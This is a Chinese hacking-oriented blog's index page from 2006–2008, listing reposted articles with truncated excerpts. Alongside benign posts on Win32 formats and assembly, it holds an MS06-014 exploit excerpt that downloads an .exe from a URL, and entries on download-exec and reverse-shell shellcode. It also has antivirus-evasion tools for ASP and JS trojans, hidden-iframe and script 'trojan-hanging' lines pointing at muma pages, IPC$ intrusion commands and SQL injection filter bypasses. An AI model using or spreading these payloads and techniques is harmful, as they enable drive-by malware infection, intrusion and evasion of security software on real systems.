- 博客(31)
- 收藏
- 关注
RSS订阅转载 Win32 Binary Resource Formats
Win32 Binary Resource Formats- - Author: Floyd Rogers Preface This document was edited and released by Microsoft Developer Support. I
2008-10-20 13:28:00
696
转载 win2003服务器安全设置技术实例(二)
6、服务器安全设置之--IP安全策略 (仅仅列出需要屏蔽或阻止的端口或协议)协议 IP协议端口 源地址 目标地址 描述 方式 ICMP -- -- -- ICMP 阻止 UDP 135 任何IP地址 我的IP地址 135-UDP 阻止 UDP 136 任何IP地址 我的IP地址 136-UDP 阻止 UDP 137 任何IP地址 我的IP地址 137-UDP 阻止 UDP 138 任何IP地址 我
2007-11-30 16:38:00
2903
转载 win2003服务器安全设置技术实例(一)
win2003服务器安全设置技术实例WindowsServer2003 + IIS6.0 + ASP + NET + PHP + PERL + MSSQL + MYSQL 最新服务器安全设置技术实例1、服务器安全设置之--硬盘权限篇? 这里着重谈需要的权限,也就是最终文件夹或硬盘需要的权限,可以防御各种木马入侵,提权攻击,跨站攻击等。本实例经过多次试验,安全性能很好,服务器基本没有被木马威胁的
2007-11-30 16:35:00
1072
转载 如何用asp的jmail发邮件?
如何用asp的jmail发邮件? 参数说明 Subject : 邮件标题 MailAddress : 发件服务器的地址,如smtp.163.com Email : 收件人邮件地址 Sender : 发件人姓名 Content : 邮件内容 Fromer : 发件人的邮件地址 Sub Sen
2007-06-05 16:37:00
1031
转载 MS06-014原始代码
on error resume next dl = "[url]http://www.baidu.com/heng.exe[/url]" Set df = document.createElement("object") df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" str="Micros
2007-05-19 10:15:00
1053
转载 让614后的新版卡巴个人版也能在Win2003上安装
让614后的新版卡巴个人版也能在Win2003上安装 在window2003系统中无法安装卡巴斯基的服务器版外的其它版本,在安装之前你需要一个小工具去修改卡巴的安装包使其能在Win2003上安装,这 个小工具就是Orca,它的版本号为3.1.4000.1830,是win2003sp1SDK里的工具。你可以到下面的地址去下载这个工具的汉化版!http://www.hanzify.org/in
2007-05-16 21:40:00
926
转载 如何学好编程
说说我个人认为该如何学好编程。希望各位别笑话偶啦(偶容易害羞啦^_^!!) 第一阶段:我觉得我们应该了解一下几种常用语言(选一种你自己喜欢的了解就行)的基本语法和规则(比如:c,c++,c#,java,perl, Delphi,vb等等)。然后可以开始学学算法,在此之前当然得必须具备应有的数据基础了(数学分析,线性代数,离散数学,概率统计,组合数学)。学算 法,当然得了解它的主要思想,而不要过分
2007-05-01 17:18:00
2347
2
转载 ASP中怎样用Request.ServerVariables获取访客的系统版本和IE版本
ASP中怎样用Request.ServerVariables获取访客的系统版本和IE版本添加:烟鬼 点击:15 时间:06.05.01 Function Browser(Info) Info=Request.ServerVariables("Http_User_Agent") 在这里初始化了Info,在实际应用中可以作为其他变量赋值
2007-04-29 23:26:00
1636
转载 ASP编写常用代码
ASP编写常用代码 1. oncontextmenu=window.event.returnvalue=false 将彻底屏蔽鼠标右键 no 可用于Table2. 取消选取、防止复制3. onpaste=return false 不准
2007-04-29 22:59:00
872
转载 Request.ServerVariables集合
Request.ServerVariables集合 ALL_HTTP客户端发送的所有HTTP标题文件。ALL_RAW检索未处理表格中所有的标题。APPL_MD_PATH检索ISAPIDLL的(WAM)Application的元数据库路径。APPL_PHYSICAL_PATH检索与元数据库路径相应的物理路径。IIS通过将APPL_MD_PATH转换为物理(
2007-04-29 22:37:00
769
转载 浏览器及系统判断的JavaScript代码
浏览器及系统判断的JavaScript代码 //======================================浏览器及系统类=============================var isGecko=navigator.userAgent.indexOf("Gecko")>0;var isIE=navigator.userAgent.indexOf("MSIE
2007-04-29 13:39:00
751
转载 document.createElement()删除创建元素
今天遇到一个小问题,却耗费我半天的时候来研究。动态创建一个元素。但是我需要使用过之后再删除掉它。找了半天资料,才找到。如下:var mydiv=document.createElement("div");//创建一个元素.mydiv.setAttribute("id","macnie");//赋值给这个元素一个ID。a1.removeNode(true) //删除这个元素.
2007-04-29 12:26:00
7263
4
转载 MS07-004分析
By axis@ph4nt0m.orgDate: 2007-01-17万众瞩目的MS07-004终于POC出炉了,之前小弟一直因为eeye的补丁比较工具bindiff在罢工,再加上一些琐事缠身,所以也没好好看这个漏洞。今天在eong兄和milw0rm上那位公布poc的老兄的基础上,好好跟了下这个漏洞。以下所有调试过程都是在简体中文版的XP SP2 Pro上进行的。首先,看写别人比较出来的因为
2007-01-24 11:12:00
1086
转载 TCP数据包的碎片、标志相关知识
有中文注释的LNS超强Phant0m`s-v7Build5规则包【转载自http://www.pcsafety.com.cn个人电脑安全论坛 Zeus著】有中文注释的Phant0m`s-v7Build5规则包先了解些TCP数据包的碎片、标志相关知识。转自网上:0. 传输层传输层在IP层的上层,通常是IP头中protocol字段中指定的协议,通常用得最多的是TCP(6)和UDP(1)。为方便理解,先
2006-09-26 10:04:00
2201
转载 ms06040 download and reverse shellcode mika修改版
[原创]ms06040 download and reverse shellcode mika 修改版文章作者:mika[EST]信息来源:邪恶八进制信息安全团队(www.eviloctal.com)首先感谢macro哥哥的代码,没有这个代码俺也不敢去想修改什么exploit。以前经常看bf弄这个漏洞那个漏洞的,也学到了点东西。有代码了,修改就方便了。程序的运行帮助如下:F:/work/e
2006-09-22 21:42:00
1489
转载 Internet Explorer VML Buffer Overflow Download Exec Exploit (0day)
[原创]又一匹烈马Internet Explorer VML Buffer Overflow Download Exec Exploit信息来源:邪恶八进制信息安全团队(www.eviloctal.com) 推荐优先使用gyzy老大修改的版本http://forum.eviloctal.com/read-htm-tid-24858.html——————————————————————————
2006-09-22 21:33:00
1544
转载 俺是这样修改ms06-040的
俺是这样修改ms06-040的---要代码的看看了文章作者:mika[EST]信息来源:邪恶八进制信息安全团队(www.eviloctal.com)被人说了一顿,俺再也不敢申请什么精华了。昨天晚上他上俺屋里把俺笑话了一番,嫌俺笨。说加个shellcode还用得着自己重新写了,有现成的DD不用,简直是脱了**放**。我说:呸呸呸,**嘴里吐不出**来,你有更好的方法你教俺啊?结果他真教俺了,我看了看
2006-08-21 15:45:00
2613
原创 虫虫免杀--虫虫变形工具vbs版
给菜菜做免杀的时候用到的,功能一般,呵呵这个是VBS脚本的变形器,JS版的变形器以及相关分析文章我放在E.S.T论坛上去了~因为并没有打算公开使用,所以比较麻烦,也没有全面测试。欢迎各位提提意见。还有生成的代码到目前为止是能过卡巴的,其他的一般也没问题。代码:转载请注明出处。虫虫于2006.7.26虫虫变形工具vbs版function change(k) s="" for i
2006-08-12 01:25:00
1596
转载 虫虫免杀--asp马免杀工具——asp万能溶剂
asp马免杀工具——asp万能溶剂文章作者:虫虫信息来源:邪恶八进制信息安全团队(www.eviloctal.com) 7天前俺询问netxfly合不合适把这个工具发出来,结果都不理俺~~~嘿嘿~~51节嘛, 大家都好忙哪~asp万能溶剂----呵呵,忽然想出了一个这样的名字给我的小工具,感觉还够形象.这是一个演示版本先打个广告吧:虫虫的asp万能溶剂----主要用于asp木马的免杀.目前为止可以
2006-08-12 01:18:00
1960
转载 虫虫免杀--js脚本免杀工具 免杀经验以及简单的分析
js脚本免杀工具 免杀经验以及简单的分析文章作者:虫虫信息来源:邪恶八进制信息安全团队(www.eviloctal.com)本文所做的实验是以ah.js(冰狐的一个变种,附件中名为"病毒样本.txt")为病毒样本进行的,其他js恶意代码没有测试。由于卡巴斯基对js的查杀力度比较大,再者我本机就安装了卡巴斯基,所以对其有少量额外的分析。菜鸟作品,难登大雅之堂,高手多多指教! ^-^常规的思路就是将
2006-08-12 01:16:00
2153
转载 win32汇编语言学习笔记(三)
汇编语言学习笔记(三) CH3、Windows汇编基础 .386.model flat,stdcalloption casemap:none 定义程序使用的指令集、工作模式 相应的还有:.8086,.486,.586,.586p 内存模式有很多,如:tiny small medium compact large
2006-07-07 11:34:00
1910
转载 Win32汇编学习笔记(二)
Win32汇编学习笔记(二) 二、微处理器AMD和Inter兼容,在程序员看来没有区别。 Pentium II III IV都是准64位的处理器。“准”是因为其外部总线64,地址总线32。一次内存总线操作可以存取8字节的数据,但内部寄存器和运算操作仍然是32位。 CPU结构上分成两部分,BIU(Bus Interface Unit)和E
2006-07-07 11:31:00
969
转载 Win32汇编学习笔记(一)
Win32汇编学习笔记(一) 一、基础信息以字节为单位存储,即Byte。1个Byte有8个bit,从高到低是7 6 5 4 3 2 1 0。第7最高,叫MSB,Most Significant Bit。第0最低,叫LSB,Least XX。 32位CPU一次操作可以处理32bit个二进制位。因此需要比字节更大的单位。比如:字(16bit)、双字(32bi
2006-07-07 11:30:00
835
原创 Linux 命令速查
Linux 命令速查Monday, 2. January 2006, 09:28:48FreeBSD, Linux, Shell 一. 启动,关机,登入,登出相关命令 登录 登出 登出 停止系统 停止系统 重启动 切断电源 把内存里的内容写入磁盘 安装lilo启动管理程序 安装lilo启动管理程序二. Shell相关命令 切换Shell 显示命令履历 设置命令别名 取消命令别名 显示
2006-07-07 11:21:00
2165
原创 汇编语言超浓缩教程
“ 哎哟,哥们儿,还捣鼓汇编呢?那东西没用,兄弟用VB"钓"一个API就够你忙活个十天半月的,还不一定搞出来。”此君之言倒也不虚,那吾等还有无必要研他一究呢?(废话,当然有啦!要不然你写这篇文章干嘛。)别急,别急,让我把这个中原委慢慢道来:一、所有电脑语言写出的程序运行时在内存中都以机器码方式存储,机器码可以被比较准确的翻译成汇编语言,这是因为汇编语言兼容性最好,故几乎所有跟踪、调试工具(包
2006-07-07 10:02:00
1001
转载 饶过'(单引号)限制继续射入
我想不少人都看过一些关于SQL Injection针对SQL Server攻击的文章,都是因为变量过滤不足甚至没有过滤而构造畸形SQL语句注入的,包括我写的那篇《SQL Injection的实现与应用》也是这样的例子,因为没有碰到任何的过滤,所以使我们相当轻松就注入成功了,如下: http://www.ilikeplmm.com/
2006-06-26 11:59:00
686
转载 正确的4种挂马方式(属于比较简单的)
一、最简单的也是最有效的 iframe src=http://www.xxx.com/muma.html width=0 height=0> 二、js挂马 script src=http://www.xxx.com/muma.j
2006-06-26 11:45:00
911
原创 DOS入侵命令全集
net use //ip/ipc$ " " /user:" " 建立IPC空链接 net use //ip/ipc$ "密码" /user:"用户名" 建立IPC非空链接 net use h: //ip/c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H: net use h: //ip/c$ 登陆后映射对方C:到本地为H: net use //ip/ipc$ /del 删除
2006-06-26 11:40:00
1481
转载 microsoft WINDOWS 系统错误代码
microsoft WINDOWS 系统错误代码-------------MS Windows Error Messages Code Error Message 0 操作成功完成。 1 功能错误。 2 系统找不到指定的文件。 3 系统找不到指定的路径。 4 系统无法打开文件。 5 拒绝访问。 6 句柄无效。 7 存储控制块被损坏。 8 存储空间不足,无法处理此命令
2006-03-11 21:04:00
5036
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人